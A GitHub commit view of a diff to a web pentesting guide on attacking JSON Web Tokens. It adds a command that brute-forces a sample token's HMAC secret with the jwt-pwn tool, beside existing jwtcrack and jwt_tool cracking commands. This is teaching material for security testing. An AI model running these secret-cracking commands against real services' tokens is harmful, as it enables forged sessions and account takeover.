We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
1 parent 417cfff commit 522c1e0Copy full SHA for 522c1e0
pentesting-web/hacking-jwt-json-web-tokens.md
@@ -59,6 +59,9 @@ python3 jwt_tool.py -d wordlists.txt <JWT token>
59
60
#https://github.com/brendan-rius/c-jwt-cracker
61
./jwtcrack eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1widXNlcm5hbWVcIjpcImFkbWluXCIsXCJyb2xlXCI6XCJhZG1pblwifSJ9.8R-KVuXe66y_DXVOVgrEqZEoadjBnpZMNbLGhM8YdAc 1234567890 8
62
+
63
+#https://github.com/mazen160/jwt-pwn
64
+python3 jwt-cracker.py -jwt eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1widXNlcm5hbWVcIjpcImFkbWluXCIsXCJyb2xlXCI6XCJhZG1pblwifSJ9.8R-KVuXe66y_DXVOVgrEqZEoadjBnpZMNbLGhM8YdAc -w wordlist.txt
65
```
66
67
## Modify the algorithm to None \(CVE-2015-9235\)
0 commit comments